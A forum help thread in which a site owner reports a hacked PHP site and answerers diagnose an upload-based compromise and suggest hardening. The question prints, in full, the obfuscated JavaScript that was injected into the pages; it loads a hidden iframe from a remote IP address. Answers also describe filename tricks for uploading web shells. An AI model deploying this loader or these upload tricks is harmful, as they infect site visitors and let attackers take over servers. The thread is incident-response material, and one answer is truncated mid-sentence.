
PHP script: malicious JavaScript code at the end

  •  17
  • caw  · Tech community  · 14 years ago

    Problem:

    I have PHP files in my web space, and all of them end with the following:

    <?php include 'footer.php'; ?>
    

    Before that line there is HTML code in the file.

    Of course, the output in the browser ends with this:

    </body>
    </html>
    

    But yesterday there was suddenly some malicious code at the end. The output of my index.php was:

    </body>
    </html><body><script>
    var i={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';l['\x76\x61\x6c\x75\x65']=j;l['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);}catch(j){return false;}
    return true;},l:function(){try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(l){return false;}
    return l.value;},j:function(){var l=i.i.i.i(i.l.i.i('.75.67.67.63.3a.2f.2f.39.32.2e.36.30.2e.31.37.37.2e.32.33.35.2f.76.61.71.72.6b.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.6b.37.36.6b.30.39'));var j=(l)?i.i.i.l():false;return j;}},l:{i:function(){var l=i.i.i.j('trashtext');var j=(l)?l:'trashtext';return j||false;},l:function(){var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x6c');l['\x77\x69\x64\x74\x68']='0.1em';l['\x68\x65\x69\x67\x68\x74']='0.2em';l['\x73\x74\x79\x6c\x65']['\x62\x6f\x72\x64\x65\x72']='none';l['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79']='none';l['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x6c';l['\x69\x64']='\x6c';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);},j:function(){var l=i.i.j.j(i.i.l.l());l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6c');var j=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x66\x72\x61\x6d\x65');j['\x68\x65\x69\x67\x68\x74']=j['\x77\x69\x64\x74\x68'];j['\x73\x72\x63']=i.i.j.i(i.i.l.i());try{l['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](j);}catch(j){}}},j:{i:function(l){return l['replace'](/[A-Za-z]/g,function(j){return String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']((((j=j.charCodeAt(0))&223)-52)%26+(j&32)+65);});},l:function(l){return i.i.j.i(l)['\x74\x6f\x53\x74\x72\x69\x6e\x67']()||false;},j:function(l){try{l();}catch(l){}}}},l:{i:{i:function(l){l=l['replace'](/[.]/g,'%');return window['\x75\x6e\x65\x73\x63\x61\x70\x65'](l);},l:'50',j:'33'},l:{i:'62',l:'83',j:'95'},j:{i:'46',l:'71',j:'52'}}}
    i.i.l.j();</script>
    

    I opened the file on my webspace (downloaded via FTP) and I saw that someone had put this code right into the file!

    How could this happen?

    The only ways I can imagine are:

    • Somebody got my FTP password. But he wouldn't only have put it into one file. He could have done much more damage. So I can't imagine this is the case.
    • I have a virus on my PC myself. I use Notepad++ for editing and FileZilla for uploading. Maybe these programs were contaminated as well and I uploaded the malicious code - without knowing.
    • Someone used a security hole (XSS) to put that code into the page. But he couldn't have put it right into the file, could he?

    Symptoms:

    Users reported a blue panel popping up in Firefox. It asked them to install a plugin. Now some of them have Java.CVE-2010086.A on their PCs.

    Is that because of the malicious code? What does the code actually do?

    Can you help me?

    Please help me, I'm really desperate.

    Perhaps one more question, if you know how this was done: how can I prevent something like this from happening in the future?

    Edit 1:

    I found a file named "x76x09.php" in the root directory of my web space. Its file size is 44.281 bytes. I downloaded it and tried to open it, but my antivirus software says it is a trojan (Trojan.Script.224490). I think this file was executed and added the malicious code to the "index.php" in every directory. Does this help? How could a trojan get into my web space? Is this a well-known virus?

    Edit 2:

    My hoster says he can now be sure that the file wasn't uploaded via FTP. So the infection didn't happen via FTP. According to my hoster, it must be insecure scripts.

    Edit 3:

    Security holes according to PhpSecInfo:

    • allow_url_fopen=1
    • allow_url_include=1
    • expose_php=1
    • file_uploads=1 (is this the reason for the malicious "x76x09.php" file?)
    • group_id=99
    • user_id=99

    Edit 4:

    I analyzed the file that was executed on my web server. Here are the results.

    So this virus seems to be called:

    • PHP/C99Shell.BF
    • Backdoor/PHP.C99Shell
    • Backdoor.Generic_c.CQA
    • Trojan.Script.224490
    • Exploit
    • Backdoor.PHP.C99Shell.bf
    • Trojan.Script.224490

    Could one of these be the malicious file that added the malicious code to my web space?
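To find every file carrying the two indicators the question reports (a script block appended after the closing `</html>`, and the packed loader inside the dropped x76x09.php), here is a read-only scanner. It is an added example, not code from the question or the answers; the file-extension list and the `\xNN` heuristic are assumptions, and every hit still needs a manual look.

```php
<?php
// Added example (not from the question): a read-only scanner for the indicators this page
// reports: a <script> injected after the closing </html> (the index.php symptom) and the
// gzuncompress(base64_decode(...)) loader of the dropped x76x09.php.  Usage: php scan.php /webroot

function scanFile(string $path): array
{
    $hits = [];
    $src  = file_get_contents($path);
    if ($src === false) {
        return $hits;
    }
    // Indicator 1: a <script> tag anywhere after the last </html> in the file.
    $pos = strripos($src, '</html>');
    if ($pos !== false && stripos($src, '<script', $pos) !== false) {
        $hits[] = 'script tag after </html>';
    }
    // Indicator 2: the packed loader signature quoted in the accepted answer.
    if (preg_match('/gzuncompress\s*\(\s*base64_decode\s*\(/i', $src)) {
        $hits[] = 'gzuncompress(base64_decode(...)) loader';
    }
    // Indicator 3 (heuristic): long runs of \xNN escapes, as in the obfuscated DOM calls above.
    if (preg_match('/(\\\\x[0-9a-f]{2}){8,}/i', $src)) {
        $hits[] = 'run of \xNN hex escapes';
    }
    return $hits;
}

function scanTree(string $root): array
{
    $findings = [];
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $file) {
        $ext = strtolower($file->getExtension());
        if ($file->isFile() && in_array($ext, ['php', 'php4', 'php5', 'phtml', 'html', 'htm', 'js'], true)) {
            $hits = scanFile($file->getPathname());
            if ($hits) {
                $findings[$file->getPathname()] = $hits;
            }
        }
    }
    return $findings;
}

foreach (scanTree($argv[1] ?? '.') as $path => $hits) {
    echo $path, PHP_EOL, '    ', implode(PHP_EOL . '    ', $hits), PHP_EOL;
}
```

Run it against a fresh FTP download of the whole web space rather than on the live server, and compare the hit list with file modification times to narrow down when the injection happened.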

    10 replies  |  until 7 years ago
        1
  •  16
  •   Daniel Trebbien    14 years ago

    I don't think the problem is that you are on shared hosting, because I have found six other hosts (degmsb, Benvolio, joomla01, DJ-Alien, valerione1979, Kars) whose websites had the same script added. Also, it is doubtful that any of your files would be writable by others, because files that are uploaded over FTP are subject to the file creation mode bits mask.

    My best guess is that someone is attacking websites using known exploits or exploits against common weaknesses, and that this person is finding targets via Google hacking. degmsb's WordPress website and Benvolio's Burning Board Lite website were likely cracked via known exploits (possibly known exploits of plugins to these software bases such as TinyMCE), and your website, since you wrote it yourself, was likely cracked via an exploit against a common website weakness.

    Given that you allow file uploads (one of your PHP scripts accepts and saves files uploaded by your users), I would look into CWE-434: Unrestricted Upload of File with Dangerous Type. A CWE-434 exploit works like this: suppose you allow users to upload avatar images or pictures. The script to which uploaded images are POSTed might save the file to /images using the same filename the user supplied. Now imagine that someone uploads x76x09.gif.php (or x76x09.gif.asp, x76x09.gif.php4, etc.). Your script would dutifully save this upload to /images/x76x09.gif.php, and all the cracker has to do to get the server to run this script is browse to /images/x76x09.gif.php. Even if the file is named x76x09.php.gif, some web servers will execute it.

    Another possibility is that the uploaded file name received by PHP, $_FILES['upload']['name'], which is the filename value in the Content-Disposition header that was sent, was crafted as ..\modules\x.gif. If the script saves the newly uploaded file to str_replace('\\', '/', '/images/' . basename($_FILES['upload']['name'])), that becomes /images/../modules/x.gif on a non-Windows host (http://codepad.org/t83dYZwa), and if the user can somehow get one of your PHP scripts to include or require any script in the modules directory (say, index.php?module=x.gif&action=blah), then the cracker can execute arbitrary PHP.

    Edit: looks like x76x09.php is some sort of unrestricted directory browser and file uploader. If a user manages to get this uploaded to your server, then they can basically do anything that you can do with your FTP access. Delete it.

    Edit 2: Look for copies of this PHP source (in part: gzuncompress(base64_decode("HJ3H...geFb//eeff/79z/8A")); ) and remove it from all of your PHP scripts.

    Edit 3: Googling parts of the PHP script, I have found several webpages where this source is listed verbatim, and all of these pages have something to do with file uploading functionality for the respective websites. It therefore seems very likely that the hacker of your website used a CWE-434 exploit.
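An upload handler hardened against the CWE-434 cases this answer describes, as an added example (not code from the question or the answer): it decides the file type from the bytes, never reuses the client-supplied name, and stores outside the document root. It assumes a form field named "upload", an upload directory at /var/www/uploads that the web server does not serve directly, and PHP 7 or later.

```php
<?php
// Added example (not from the question or answer): upload handler hardened against CWE-434.
// The pattern criticised above was  move_uploaded_file($tmp, '/images/' . basename($_FILES['upload']['name']));
// which keeps the client name (x76x09.gif.php, x76x09.php.gif, ..\modules\x.gif) and saves under the web root.

const UPLOAD_DIR = '/var/www/uploads';   // assumed: outside the document root, so nothing here is ever executed
const ALLOWED    = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];

function saveUpload(array $file): string
{
    // 1. Only accept a file PHP itself placed in the temp dir; rejects forged $_FILES entries.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('no valid upload');
    }
    // 2. Decide the type from the content, not from the name the client sent: the name is
    //    never consulted again, so double extensions and backslash tricks have nothing to act on.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED[$mime])) {
        throw new RuntimeException("type not allowed: $mime");
    }
    // 3. Server-generated name with an extension chosen from the allowlist.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('move failed');
    }
    chmod($dest, 0644);   // readable, never executable
    return $name;         // record this; serve it through a script that sets Content-Type itself
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['upload'])) {
    try {
        echo 'stored as ', htmlspecialchars(saveUpload($_FILES['upload']));
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'rejected: ', htmlspecialchars($e->getMessage());
    }
}
```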

        2
  •  7
  •   Sarfraz    14 years ago

    Your server seems to have been compromised. Are you on shared hosting too?

    PhpSecInfo

    (screenshot of PhpSecInfo output: http://phpsec.org/images/psi_ss2.png)

        3
  •  3
  •   Kerry Jones    14 years ago

    Who are you hosted with? Some hosters have security holes that can be exploited.

    Are you using WordPress? There have also been a number of reported outbreaks. The best thing to do would be to google it looking for people with similar problems, which will also lead to the cause, which will lead to the solutions.

        4
  •  3
  •   KCL    14 years ago

    As others have suggested, the vulnerability is most likely in some script you are using, maybe something you've written yourself or a well-known application that has known vulnerabilities. This might be a vulnerability in an upload script, but I want to point out that it is also possible to "upload" files through SQL injection; see the following thread for more details.

        5
  •  2
  •   phsource    14 years ago

    We experienced a problem similar to this a while ago with one of our major web properties. What your web host said was correct: it was likely not due to FTP access, but to an insecure script that somehow allowed modification of arbitrary files. In our case, a vulnerability in an old phpMyAdmin allowed changes to some PHP scripts.

    Read privileges to all scripts and HTML files. It turns out that Apache could also write to scripts in our case. Simply:

    # hand the tree to an account that is not the web server's; the server keeps read access only
    cd web_files_directory
    chown -R some_not_web_server_user:some_not_web_server_group .
    find . -type f -exec chmod 644 {} +   # files: owner read/write, everyone else read-only
    find . -type d -exec chmod 755 {} +   # directories: owner full, others list/traverse only
    
        6
  •  1
  •   Jason    14 years ago

    I would suggest changing any FTP or SSH passwords to be very secure. If you use a hosting provider you should also notify them of the breach. If you do not have logs to investigate the matter then they may. You should also Google the code that was added to your page to see if you can find anything else.

        7
  •  1
  •   CaseySoftware    14 years ago

    If you're on a shared server, other people have access to the server itself. This is sort of the definition of a shared server. The problem is that if you have files with permissions of 777, they are world-user-group writable. Which means anyone with access to the box can write to them. See the problem?

    All it takes is one person on that box to have a weak password, a poorly configured script, or a horrible bit of code, and a mediocre script kiddie can cause all kinds of problems all over the box. Most of these attacks are purely automated. They get access, scan for attackable files, and append as needed.

    Most likely, you should change all of your files to 755 or 644 permissions. You'll sleep better at night.

        8
  •  1
  •   Peter    14 years ago

    of the access points are which could be exploited. Unfortunately, that may not be good enough (writing and maintaining secure web applications is harder than most people think).

    If you did not write the application yourself, or if you are using large, complex components written by others, or if you simply need help with website security, there are commercial services that will crawl your website and try to find its weaknesses, for example:

    http://www.qualys.com/products/qg_suite/was/
    

    Obviously these services cost money, but you can usually get a "free trial" to see whether they are useful. Good luck!

        9
  •  0
  •   GOsha    14 years ago

    If you have a static IP, you can block FTP access from any IP other than yours.

        10
  •  0
  •   bpeterson76    14 years ago

    This happened to me a while ago, in a different way. A work account was compromised through a code vulnerability in phpBB. Somehow they even added themselves to the MySQL db users table. That led us to remove the program entirely and stop using it.

    An old Joomla installation was the hole that allowed people to do what you describe to my personal website. I had forgotten it was even out there, but it was enough to open the door for them to install malicious code on several different sites. I shut down the site, changed permissions, updated Joomla, and removed the files.

    My current production server gets "sniffed" for phpMyAdmin more than 1000 times per hour during some peak hack attempts. The bad guys are working overtime!

    Bottom line: be careful with open-source code, and if you do use it, update, update, update.